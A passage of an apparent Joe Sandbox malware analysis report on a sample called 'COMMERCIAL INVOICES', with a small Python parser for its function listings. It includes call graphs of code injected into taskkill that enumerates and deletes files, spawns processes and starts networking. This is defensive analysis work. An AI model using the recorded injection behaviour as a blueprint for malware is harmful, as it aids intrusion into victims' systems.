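            for part in parts[1:]:
                k, _, v = part.partition(":")
                cur[k.strip().lower().replace(" ", "_")] = v.strip()
        else:
            cur[key.lower().replace(" ", "_")] = val
    return entries


def ntdll_diagnostic_entries(entries: List[Dict[str, object]]) -> List[Dict[str, object]]:
    """Entries whose referenced strings are ntdll's own loader/RTL messages."""
    return [e for e in entries
            if any(str(s).startswith(NTDLL_MARKERS) for s in e.get("strings", []))]


def group_by_dump(entries: List[Dict[str, object]]) -> Dict[Tuple[object, object], List[Dict[str, object]]]:
    """Group entries by (dump file, offset) so one mapped region is reviewed together."""
    groups: Dict[Tuple[object, object], List[Dict[str, object]]] = {}
    for e in entries:
        groups.setdefault((e.get("source_file"), e.get("offset")), []).append(e)
    return groups


if __name__ == "__main__":
    parsed = parse_entries(SAMPLE)
    for (dump, off), group in group_by_dump(parsed).items():
        flagged = ntdll_diagnostic_entries(group)
        print(f"{dump} @ {off}: {len(group)} functions, {len(flagged)} with ntdll diagnostics")
        for e in flagged:
            print("  ", e["instruction_id"], e["strings"][0][:60])
```

Run it on the full function listing (strip the leading whitespace first, as the parser does per line) and the `group_by_dump` keys tell you how many distinct regions the report pulled functions from; the flagged entries are the ones worth opening in the dump to confirm whether the region is a PE image of ntdll rather than the sample's own code.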
Memory Dump Source
• Source File: 00000004.00000002.2544254617.0000000001210000.00000040.00001000.00020000.00000000.sdmp, Offset: 01210000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_1210000_COMMERCIAL INVOICES.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 2a48bdd4d8ea14c469ad441b94cf96c101b09c67394ceba66eb56f2a3b9e53c1
• Instruction ID: 14d4a161ba0c519e36bc5703057dc7135a6c108e8af2ed16f1fd1b22861b6428
• Opcode Fuzzy Hash: 2a48bdd4d8ea14c469ad441b94cf96c101b09c67394ceba66eb56f2a3b9e53c1
• Instruction Fuzzy Hash: DA0217B1508341AFD309DF58C590A6BBBE5FFC8708F04892DF98987258DB71E905CB52

Memory Dump Source
• Source File: 00000004.00000002.2544254617.0000000001210000.00000040.00001000.00020000.00000000.sdmp, Offset: 01210000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_1210000_COMMERCIAL INVOICES.jbxd
Similarity
• API ID: __aulldvrm
• String ID: +$-$0$0
• API String ID: 1302938615-699404926
• Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
• Instruction ID: 4d2daacbc32a3aa6b8f52d3a0d1e0171f50d34e643ab8d24c78bef3ac946214c
• Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
• Instruction Fuzzy Hash: B081C231E3725A9EEF29BE6CC8517BE7BA1AF45310F1C421DDA61A72D1C63498408B51

Memory Dump Source
• Source File: 00000004.00000002.2544254617.0000000001210000.00000040.00001000.00020000.00000000.sdmp, Offset: 01210000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_1210000_COMMERCIAL INVOICES.jbxd
Similarity
• API ID: ___swprintf_l
• String ID: %%%u$[$]:%u
• API String ID: 48624451-2819853543
• Opcode ID: bc3b1325c2bd85aa5f7a48ff4adca24a67e7ccbf872d3768f236d2f648a8a45a
• Instruction ID: 16d5c266c57e9d6735cc29dde8844c62971f2a86f924526a4a12fc6935cb1a4e
• Opcode Fuzzy Hash: bc3b1325c2bd85aa5f7a48ff4adca24a67e7ccbf872d3768f236d2f648a8a45a
• Instruction Fuzzy Hash: 6A215676A2011A9BDB11DE69CC50AFFBBECAF55654F440129EB05E3241E730D9018BA5

Strings
• RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 012B02E7
• RTL: Re-Waiting, xrefs: 012B031E
• RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 012B02BD
Memory Dump Source
• Source File: 00000004.00000002.2544254617.0000000001210000.00000040.00001000.00020000.00000000.sdmp, Offset: 01210000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_1210000_COMMERCIAL INVOICES.jbxd
Similarity
• API ID:
• String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
• API String ID: 0-2474120054
• Opcode ID: ff242eab366eef86d63e06c2f4e5f014ee8adbc23560ee16d6fe736b68389008
• Instruction ID: 85ecced33ce76a4389fc6cde5bdd756fdf8031e3cbda99ba1ac1e1e653b2900e
• Opcode Fuzzy Hash: ff242eab366eef86d63e06c2f4e5f014ee8adbc23560ee16d6fe736b68389008
• Instruction Fuzzy Hash: 60E100306243429FEB26CF28D995B6ABBE4BF84354F140A5DF6A18B2D1D774D884CB42

Strings
• RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 012B7B7F
• RTL: Re-Waiting, xrefs: 012B7BAC
• RTL: Resource at %p, xrefs: 012B7B8E
Memory Dump Source
• Source File: 00000004.00000002.2544254617.0000000001210000.00000040.00001000.00020000.00000000.sdmp, Offset: 01210000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_1210000_COMMERCIAL INVOICES.jbxd
Similarity
• API ID:
• String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
• API String ID: 0-871070163
• Opcode ID: 6f062211691b012f063d0f154cd1c4351eceb72a85c445dc3d7136b961bb971b
• Instruction ID: 0a8fe8d14c7c653dd7214c13b546fd6bdd27df1cc81d6c9f98058fa93f69cf19
• Opcode Fuzzy Hash: 6f062211691b012f063d0f154cd1c4351eceb72a85c445dc3d7136b961bb971b
• Instruction Fuzzy Hash: 6C41E2313257039FD720DE29C841B6BB7E5EF99B10F000A1DFA56DB680DB72E5058B92

APIs
• __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 012B728C
Strings
• RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 012B7294
• RTL: Re-Waiting, xrefs: 012B72C1
• RTL: Resource at %p, xrefs: 012B72A3
Memory Dump Source
• Source File: 00000004.00000002.2544254617.0000000001210000.00000040.00001000.00020000.00000000.sdmp, Offset: 01210000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_1210000_COMMERCIAL INVOICES.jbxd
Similarity
• API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
• String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
• API String ID: 885266447-605551621
• Opcode ID: e1df56df71396823049bf126fa9fae5187b036aea17b3a70a3dc822168bf8c6a
• Instruction ID: 33f26474fa9ab5d20d724fe7965e9e10a04731bed7bdbd16f305bf3329ed9233
• Opcode Fuzzy Hash: e1df56df71396823049bf126fa9fae5187b036aea17b3a70a3dc822168bf8c6a
• Instruction Fuzzy Hash: 3B411F35620203ABC720DE29CC81BAAB7A1FB94750F140619FA55AB280DB31E802CBD1

Memory Dump Source
• Source File: 00000004.00000002.2544254617.0000000001210000.00000040.00001000.00020000.00000000.sdmp, Offset: 01210000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_1210000_COMMERCIAL INVOICES.jbxd
Similarity
• API ID: ___swprintf_l
• String ID: %%%u$]:%u
• API String ID: 48624451-3050659472
• Opcode ID: e106821b9bf6ee0ca690050a47b92818e96c187c38de609d63d87e412d0d3729
• Instruction ID: b31babf0ad179e5f7d9f3251f764e3d85980862d545d8d0d5862d3e5098fc89e
• Opcode Fuzzy Hash: e106821b9bf6ee0ca690050a47b92818e96c187c38de609d63d87e412d0d3729
• Instruction Fuzzy Hash: D331577261051ADFDB20DF2DDC40BFEB7B8EB55610F444569EA49E3240EB30DA448B60

Memory Dump Source
• Source File: 00000004.00000002.2544254617.0000000001210000.00000040.00001000.00020000.00000000.sdmp, Offset: 01210000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_1210000_COMMERCIAL INVOICES.jbxd
Similarity
• API ID: __aulldvrm
• String ID: +$-
• API String ID: 1302938615-2137968064
• Opcode ID: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
• Instruction ID: 8695abd97427582f03ba9f4b9743a3d240ecf9fd1db130f6afc6f0c7b12149fd
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: B391D471E2220B9BEB24FF6EC8816BEBBA5BF54320F74451AEA55E72C0D7309941C711
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2544254617.0000000001210000.00000040.00001000.00020000.00000000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_1210000_COMMERCIAL INVOICES.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID: $$@
                                                                                                                                                                                                                                      • API String ID: 0-1194432280
                                                                                                                                                                                                                                      • Opcode ID: 02ef6bd9acd747190dc7cccab178e086c6471ef6054d210ade15af69ca7285f2
                                                                                                                                                                                                                                      • Instruction ID: 28a86925fdec5cd463d13f3935ab961e06fa886592e21daadd785efff9a82aba
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 02ef6bd9acd747190dc7cccab178e086c6471ef6054d210ade15af69ca7285f2
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A0811B71D1126ADBDB35CB54CC45BEEB7B8AB08754F0041EAEA19B7280D7709E84CFA4

                                                                                                                                                                                                                                      Execution Graph

                                                                                                                                                                                                                                      Execution Coverage:2.3%
                                                                                                                                                                                                                                      Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                                      Signature Coverage:1.7%
                                                                                                                                                                                                                                      Total number of Nodes:410
                                                                                                                                                                                                                                      Total number of Limit Nodes:68
                                                                                                                                                                                                                                      execution_graph 97401 862f03 97406 867b70 97401->97406 97404 862f2f 97407 867b8a 97406->97407 97411 862f13 97406->97411 97415 8788d0 97407->97415 97410 879210 NtClose 97410->97411 97411->97404 97412 879210 97411->97412 97413 87922a 97412->97413 97414 87923b NtClose 97413->97414 97414->97404 97416 8788ea 97415->97416 97419 4be35c0 LdrInitializeThunk 97416->97419 97417 867c5a 97417->97410 97419->97417 97420 86ab40 97425 86a850 97420->97425 97422 86ab4d 97437 86a4d0 97422->97437 97424 86ab69 97427 86a875 97425->97427 97426 86a9c3 97426->97422 97427->97426 97447 8731c0 97427->97447 97429 86a9da 97429->97422 97430 86a9d1 97430->97429 97432 86aac7 97430->97432 97462 869f20 97430->97462 97434 86ab2a 97432->97434 97471 86a290 97432->97471 97475 87b300 97434->97475 97438 86a4e6 97437->97438 97444 86a4f1 97437->97444 97439 87b3e0 RtlAllocateHeap 97438->97439 97439->97444 97440 86a512 97440->97424 97441 86a822 97442 86a83b 97441->97442 97443 87b300 RtlFreeHeap 97441->97443 97442->97424 97443->97442 97444->97440 97444->97441 97445 869f20 RtlFreeHeap 97444->97445 97446 86a290 RtlFreeHeap 97444->97446 97445->97444 97446->97444 97448 8731ce 97447->97448 97449 8731d5 97447->97449 97448->97430 97478 864350 97449->97478 97452 873219 97458 8733c7 97452->97458 97483 87b3e0 97452->97483 97455 873232 97456 8733bd 97455->97456 97455->97458 97460 87324e 97455->97460 97457 87b300 RtlFreeHeap 97456->97457 97456->97458 97457->97458 97458->97430 97459 87b300 RtlFreeHeap 97461 8733b1 97459->97461 97460->97458 97460->97459 97461->97430 97463 869f46 97462->97463 97489 86d940 97463->97489 97465 869fb8 97467 86a140 97465->97467 97468 869fd6 97465->97468 97466 86a125 97466->97430 97467->97466 97469 869de0 RtlFreeHeap 97467->97469 97468->97466 97494 869de0 97468->97494 
97469->97467 97472 86a2b6 97471->97472 97473 86d940 RtlFreeHeap 97472->97473 97474 86a33d 97473->97474 97474->97432 97502 879590 97475->97502 97477 86ab31 97477->97422 97479 864374 97478->97479 97480 86437b 97479->97480 97481 8643b0 LdrLoadDll 97479->97481 97480->97452 97482 872c80 LdrLoadDll 97480->97482 97481->97480 97482->97452 97486 879540 97483->97486 97485 87b3fb 97485->97455 97487 87955a 97486->97487 97488 87956b RtlAllocateHeap 97487->97488 97488->97485 97491 86d964 97489->97491 97490 86d971 97490->97465 97491->97490 97492 87b300 RtlFreeHeap 97491->97492 97493 86d9b4 97492->97493 97493->97465 97495 869dfd 97494->97495 97498 86d9d0 97495->97498 97497 869f03 97497->97468 97499 86d9f4 97498->97499 97500 86da9e 97499->97500 97501 87b300 RtlFreeHeap 97499->97501 97500->97497 97501->97500 97503 8795ad 97502->97503 97504 8795be RtlFreeHeap 97503->97504 97504->97477 97505 879080 97506 879127 97505->97506 97508 8790ab 97505->97508 97507 87913d NtReadFile 97506->97507 97514 860c0b PostThreadMessageW 97515 860c1d 97514->97515 97516 866c0b 97517 866ba1 97516->97517 97520 866c0e 97516->97520 97521 867d20 97517->97521 97519 866be4 97522 867d3d 97521->97522 97528 878920 97522->97528 97524 867d8d 97525 867d94 97524->97525 97533 878a00 97524->97533 97525->97519 97527 867dbd 97527->97519 97529 8789b8 97528->97529 97530 878948 97528->97530 97538 4be2f30 LdrInitializeThunk 97529->97538 97530->97524 97531 8789f1 97531->97524 97534 878aae 97533->97534 97535 878a2c 97533->97535 97539 4be2d10 LdrInitializeThunk 97534->97539 97535->97527 97536 878af3 97536->97527 97538->97531 97539->97536 97540 86718b 97542 867125 97540->97542 97541 867182 97542->97540 97542->97541 97544 86b070 97542->97544 97545 86b096 97544->97545 97546 86b2c9 97545->97546 97571 879620 97545->97571 97546->97541 97548 86b10c 97548->97546 97574 87c5f0 97548->97574 97550 86b12b 97550->97546 97551 86b202 97550->97551 97580 878830 97550->97580 97553 86b221 97551->97553 97555 865930 LdrInitializeThunk 97551->97555 
97558 86b2b1 97553->97558 97592 8783a0 97553->97592 97555->97553 97556 86b196 97556->97546 97557 86b1ea 97556->97557 97559 86b1c8 97556->97559 97584 865930 97556->97584 97588 867ef0 97557->97588 97563 867ef0 LdrInitializeThunk 97558->97563 97607 8745f0 LdrInitializeThunk 97559->97607 97567 86b2bf 97563->97567 97566 86b288 97597 878450 97566->97597 97567->97541 97569 86b2a2 97602 8785b0 97569->97602 97572 87963d 97571->97572 97573 87964e CreateProcessInternalW 97572->97573 97573->97548 97575 87c560 97574->97575 97576 87c5bd 97575->97576 97577 87b3e0 RtlAllocateHeap 97575->97577 97576->97550 97578 87c59a 97577->97578 97579 87b300 RtlFreeHeap 97578->97579 97579->97576 97581 87884a 97580->97581 97608 4be2c0a 97581->97608 97582 86b18d 97582->97551 97582->97556 97585 86593c 97584->97585 97586 878a00 LdrInitializeThunk 97585->97586 97587 86596e 97586->97587 97587->97559 97589 867f03 97588->97589 97611 878730 97589->97611 97591 867f2e 97591->97541 97593 87841d 97592->97593 97595 8783cb 97592->97595 97617 4be39b0 LdrInitializeThunk 97593->97617 97594 878442 97594->97566 97595->97566 97598 8784ca 97597->97598 97600 878478 97597->97600 97618 4be4340 LdrInitializeThunk 97598->97618 97599 8784ef 97599->97569 97600->97569 97603 878630 97602->97603 97604 8785df 97602->97604 97619 4be2fb0 LdrInitializeThunk 97603->97619 97604->97558 97605 878655 97605->97558 97607->97557 97609 4be2c1f LdrInitializeThunk 97608->97609 97610 4be2c11 97608->97610 97609->97582 97610->97582 97612 8787ae 97611->97612 97614 87875b 97611->97614 97616 4be2dd0 LdrInitializeThunk 97612->97616 97613 8787d3 97613->97591 97614->97591 97616->97613 97617->97594 97618->97599 97619->97605 97620 868614 97621 868624 97620->97621 97623 8685d4 97621->97623 97624 866eb0 97621->97624 97625 866ec6 97624->97625 97627 866eff 97624->97627 97625->97627 97628 866d20 LdrLoadDll 97625->97628 97627->97623 97628->97627 97629 859b90 97630 859b9f 97629->97630 97631 859be0 97630->97631 97632 859bcd CreateThread 97630->97632 97633 
862090 97634 878830 LdrInitializeThunk 97633->97634 97635 8620c6 97634->97635 97636 871590 97637 8715ac 97636->97637 97638 8715d4 97637->97638 97639 8715e8 97637->97639 97640 879210 NtClose 97638->97640 97641 879210 NtClose 97639->97641 97642 8715dd 97640->97642 97643 8715f1 97641->97643 97646 87b420 RtlAllocateHeap 97643->97646 97645 8715fc 97646->97645 97647 878f10 97648 878fc7 97647->97648 97650 878f3f 97647->97650 97649 878fdd NtCreateFile 97648->97649 97653 86c3e0 97655 86c409 97653->97655 97654 86c50d 97655->97654 97656 86c4b3 FindFirstFileW 97655->97656 97656->97654 97658 86c4ce 97656->97658 97657 86c4f4 FindNextFileW 97657->97658 97659 86c506 FindClose 97657->97659 97658->97657 97659->97654 97660 875ee0 97661 875f3a 97660->97661 97663 875f47 97661->97663 97664 8738f0 97661->97664 97665 87390f 97664->97665 97666 864350 LdrLoadDll 97665->97666 97668 873a3e 97665->97668 97669 873977 97665->97669 97666->97669 97667 8739c0 Sleep 97667->97669 97668->97663 97669->97667 97669->97668 97671 875e40 LdrLoadDll Sleep 97669->97671 97671->97669 97677 878660 97678 8786ec 97677->97678 97680 878688 97677->97680 97682 4be2ee0 LdrInitializeThunk 97678->97682 97679 87871d 97682->97679 97683 8787e0 97684 8787fa 97683->97684 97687 4be2df0 LdrInitializeThunk 97684->97687 97685 878822 97687->97685 97688 871920 97693 871939 97688->97693 97689 8719c6 97690 871981 97691 87b300 RtlFreeHeap 97690->97691 97692 871991 97691->97692 97693->97689 97693->97690 97694 8719c1 97693->97694 97695 87b300 RtlFreeHeap 97694->97695 97695->97689 97696 869a2c 97697 869a31 97696->97697 97698 869a5d 97697->97698 97699 87b300 RtlFreeHeap 97697->97699 97699->97698 97700 4be2ad0 LdrInitializeThunk 97701 862568 97702 86257c 97701->97702 97705 8660c0 97702->97705 97704 862593 97706 8660f3 97705->97706 97707 866117 97706->97707 97712 878d70 97706->97712 97707->97704 97709 86613a 97709->97707 97710 879210 NtClose 97709->97710 97711 8661ba 97710->97711 97711->97704 97713 878d8d 97712->97713 97716 4be2ca0 
LdrInitializeThunk 97713->97716 97714 878db9 97714->97709 97716->97714 97717 859bf0 97718 859f18 97717->97718 97719 85a42a 97718->97719 97721 87af60 97718->97721 97722 87af86 97721->97722 97727 854120 97722->97727 97724 87af92 97725 87afcb 97724->97725 97730 875470 97724->97730 97725->97719 97734 863010 97727->97734 97729 85412d 97729->97724 97731 8754d1 97730->97731 97732 8754de 97731->97732 97745 8617c0 97731->97745 97732->97725 97735 86302d 97734->97735 97737 863046 97735->97737 97738 879c90 97735->97738 97737->97729 97739 879caa 97738->97739 97740 879cd9 97739->97740 97741 878830 LdrInitializeThunk 97739->97741 97740->97737 97742 879d39 97741->97742 97743 87b300 RtlFreeHeap 97742->97743 97744 879d52 97743->97744 97744->97737 97746 8617fb 97745->97746 97763 867c80 97746->97763 97748 861803 97749 861ae6 97748->97749 97750 87b3e0 RtlAllocateHeap 97748->97750 97749->97732 97751 861819 97750->97751 97752 87b3e0 RtlAllocateHeap 97751->97752 97753 86182a 97752->97753 97754 87b3e0 RtlAllocateHeap 97753->97754 97755 86183b 97754->97755 97762 8618d2 97755->97762 97778 866820 NtClose LdrInitializeThunk LdrInitializeThunk 97755->97778 97757 864350 LdrLoadDll 97758 861a92 97757->97758 97759 861ac1 WSAStartup 97758->97759 97760 861acf 97758->97760 97759->97760 97774 877db0 97760->97774 97762->97757 97764 867cac 97763->97764 97765 867b70 2 API calls 97764->97765 97766 867ccf 97765->97766 97767 867cf1 97766->97767 97768 867cd9 97766->97768 97770 867d0d 97767->97770 97772 879210 NtClose 97767->97772 97769 867ce4 97768->97769 97771 879210 NtClose 97768->97771 97769->97748 97770->97748 97771->97769 97773 867d03 97772->97773 97773->97748 97775 877e12 97774->97775 97777 877e1f 97775->97777 97779 861b00 97775->97779 97777->97749 97778->97762 97793 867f50 97779->97793 97781 862073 97781->97777 97783 861d3b 97785 87c5f0 2 API calls 97783->97785 97784 861b20 97784->97781 97797 87c4c0 97784->97797 97787 861d50 97785->97787 97786 867ef0 LdrInitializeThunk 97789 861d9a 97786->97789 
97787->97789 97802 860630 97787->97802 97789->97781 97789->97786 97791 860630 LdrInitializeThunk 97789->97791 97790 867ef0 LdrInitializeThunk 97792 861ee8 97790->97792 97791->97789 97792->97789 97792->97790 97794 867f5d 97793->97794 97795 867f85 97794->97795 97796 867f7e SetErrorMode 97794->97796 97795->97784 97796->97795 97798 87c4d6 97797->97798 97799 87c4d0 97797->97799 97800 87b3e0 RtlAllocateHeap 97798->97800 97799->97783 97801 87c4fc 97800->97801 97801->97783 97804 86063b 97802->97804 97804->97792 97805 8606a5 97804->97805 97806 8794a0 97804->97806 97805->97792 97807 8794ba 97806->97807 97810 4be2c70 LdrInitializeThunk 97807->97810 97808 8794e2 97808->97804 97810->97808 97811 86f630 97812 86f694 97811->97812 97813 8660c0 2 API calls 97812->97813 97815 86f7c7 97813->97815 97814 86f7ce 97815->97814 97838 8661d0 97815->97838 97818 86f973 97820 86f86e 97821 86f982 97820->97821 97847 86f410 97820->97847 97822 879210 NtClose 97821->97822 97824 86f98c 97822->97824 97825 86f886 97825->97821 97826 86f891 97825->97826 97827 87b3e0 RtlAllocateHeap 97826->97827 97828 86f8ba 97827->97828 97829 86f8c3 97828->97829 97830 86f8d9 97828->97830 97831 879210 NtClose 97829->97831 97856 86f300 CoInitialize 97830->97856 97833 86f8cd 97831->97833 97834 879210 NtClose 97835 86f96c 97834->97835 97837 87b300 RtlFreeHeap 97835->97837 97836 86f8e7 97836->97834 97837->97818 97839 8661f5 97838->97839 97859 878b50 97839->97859 97842 876d10 97843 876d75 97842->97843 97844 876da8 97843->97844 97864 87023c NtClose RtlFreeHeap LdrInitializeThunk 97843->97864 97844->97820 97846 876d8a 97846->97820 97848 86f42c 97847->97848 97849 864350 LdrLoadDll 97848->97849 97851 86f44a 97849->97851 97850 86f453 97850->97825 97851->97850 97852 864350 LdrLoadDll 97851->97852 97853 86f51e 97852->97853 97854 864350 LdrLoadDll 97853->97854 97855 86f57b 97853->97855 97854->97855 97855->97825 97858 86f365 97856->97858 97857 86f3fb CoUninitialize 97857->97836 97858->97857 97860 878b6a 97859->97860 97863 4be2c60 
LdrInitializeThunk 97860->97863 97861 866269 97861->97818 97861->97842 97863->97861 97864->97846 97865 8659b0 97866 867ef0 LdrInitializeThunk 97865->97866 97867 8659e0 97866->97867 97869 865a0c 97867->97869 97870 867e70 97867->97870 97871 867eb4 97870->97871 97872 867ed5 97871->97872 97877 878500 97871->97877 97872->97867 97874 867ec5 97875 867ee1 97874->97875 97876 879210 NtClose 97874->97876 97875->97867 97876->97872 97878 87857d 97877->97878 97880 87852b 97877->97880 97882 4be4650 LdrInitializeThunk 97878->97882 97879 8785a2 97879->97874 97880->97874 97882->97879 97883 866f30 97884 866f4c 97883->97884 97887 866f9f 97883->97887 97886 879210 NtClose 97884->97886 97884->97887 97885 8670d7 97888 866f67 97886->97888 97887->97885 97894 866350 NtClose LdrInitializeThunk 97887->97894 97893 866350 NtClose LdrInitializeThunk 97888->97893 97890 8670b1 97890->97885 97895 866520 NtClose LdrInitializeThunk LdrInitializeThunk 97890->97895 97893->97887 97894->97890 97895->97885 97896 86ff30 97897 86ff53 97896->97897 97898 864350 LdrLoadDll 97897->97898 97899 86ff77 97898->97899 97900 876d10 3 API calls 97899->97900 97901 8700fe 97899->97901 97900->97901 97902 879170 97903 8791e7 97902->97903 97905 87919b 97902->97905 97904 8791fd NtDeleteFile 97903->97904 97906 868178 GetFileAttributesW 97907 868193 97906->97907
APIs
• FindFirstFileW.KERNELBASE(?,00000000), ref: 0086C4C4
• FindNextFileW.KERNELBASE(?,00000010), ref: 0086C4FF
• FindClose.KERNELBASE(?), ref: 0086C50A
Memory Dump Source
• Source File: 00000006.00000002.3897564995.0000000000850000.00000040.80000000.00040000.00000000.sdmp, Offset: 00850000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_850000_taskkill.jbxd
Yara matches
Similarity
• API ID: Find$File$CloseFirstNext
• String ID:
• API String ID: 3541575487-0
• Opcode ID: 1a4588cff350d22efd1582e4eac99176c3ada84599096f23ca51eba49280e49f
• Instruction ID: f8323e671047d0862e5a1512e92b46e11e8e11d6cc524e1896dc131f3e76027f
• Opcode Fuzzy Hash: 1a4588cff350d22efd1582e4eac99176c3ada84599096f23ca51eba49280e49f
• Instruction Fuzzy Hash: 07316371A00258BBDB60DB68CC85FFF77BCFF44744F144498B949E6181DA70AA848BA1
APIs
• NtCreateFile.NTDLL(?,?,?,?,?,?,?,?,?,?,?), ref: 0087900E
Memory Dump Source
• Source File: 00000006.00000002.3897564995.0000000000850000.00000040.80000000.00040000.00000000.sdmp, Offset: 00850000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_850000_taskkill.jbxd
Yara matches
Similarity
• API ID: CreateFile
• String ID:
• API String ID: 823142352-0
• Opcode ID: 3fe039b03d3e8ba52d4e053b4d83f45fce84fc282e24ed526cc190fa88aecc1e
• Instruction ID: 026b22160e7388a58e63da5d565a76e3d55ccd116e5de79beb00b7e672db2984
• Opcode Fuzzy Hash: 3fe039b03d3e8ba52d4e053b4d83f45fce84fc282e24ed526cc190fa88aecc1e
• Instruction Fuzzy Hash: 8C31B5B5A00208AFCB14DF98D885EEEBBF9FF88304F108109F959A7344D770A851CBA5
APIs
• NtReadFile.NTDLL(?,?,?,?,?,?,?,?,?), ref: 00879166
Memory Dump Source
• Source File: 00000006.00000002.3897564995.0000000000850000.00000040.80000000.00040000.00000000.sdmp, Offset: 00850000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_850000_taskkill.jbxd
Yara matches
Similarity
• API ID: FileRead
• String ID:
• API String ID: 2738559852-0
• Opcode ID: a1ebfaff676f34ec72b2be1eff50992f2b65536806e661c1ed21424d37369546
• Instruction ID: c6c404a0ee70456a132f958a5ff46c1ab66c32156c704720940e7e8527e1d652
• Opcode Fuzzy Hash: a1ebfaff676f34ec72b2be1eff50992f2b65536806e661c1ed21424d37369546
• Instruction Fuzzy Hash: 4D31E7B5A00249ABCB14DF98D885EEFB7B9EF88314F108219F919A7344D770A851CBA5
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000006.00000002.3897564995.0000000000850000.00000040.80000000.00040000.00000000.sdmp, Offset: 00850000, based on PE: false
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_850000_taskkill.jbxd
                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: DeleteFile
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 4033686569-0
                                                                                                                                                                                                                                      • Opcode ID: 8aa1ffc4ea7dd53c13a2e595b786a956afe812bdd4d7f26d3ee0cdc4469b6fb1
                                                                                                                                                                                                                                      • Instruction ID: 5a1ae5258cab18adc239e7620a0b4bb05bc85f45d0216dffb9a8fceecd0e3682
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8aa1ffc4ea7dd53c13a2e595b786a956afe812bdd4d7f26d3ee0cdc4469b6fb1
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 43115E71A10208BAD610EB58DC46FEFB7ACEB85314F408109FA4DAB245D771B905CBA6
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • NtClose.NTDLL(?,?,001F0001,?,00000000,?,00000000,00000104), ref: 00879244
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000006.00000002.3897564995.0000000000850000.00000040.80000000.00040000.00000000.sdmp, Offset: 00850000, based on PE: false
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_850000_taskkill.jbxd
                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Close
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 3535843008-0
                                                                                                                                                                                                                                      • Opcode ID: febe32e7eea80cbd433ec382fcb712a4c5645aad6e5cf033f31accf23b9c9390
                                                                                                                                                                                                                                      • Instruction ID: 175b1ddd2c96f2886d0ec0867ed358b951a3261f0171a52c95dbad378f23c44d
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: febe32e7eea80cbd433ec382fcb712a4c5645aad6e5cf033f31accf23b9c9390
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 19E086352003047BC610FA59DC45F9B775DDFC5754F408015FA08A7141CA71B901C7F5
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000006.00000002.3899568873.0000000004B70000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B70000, based on PE: true
• Associated: 00000006.00000002.3899568873.0000000004C99000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000006.00000002.3899568873.0000000004C9D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000006.00000002.3899568873.0000000004D0E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
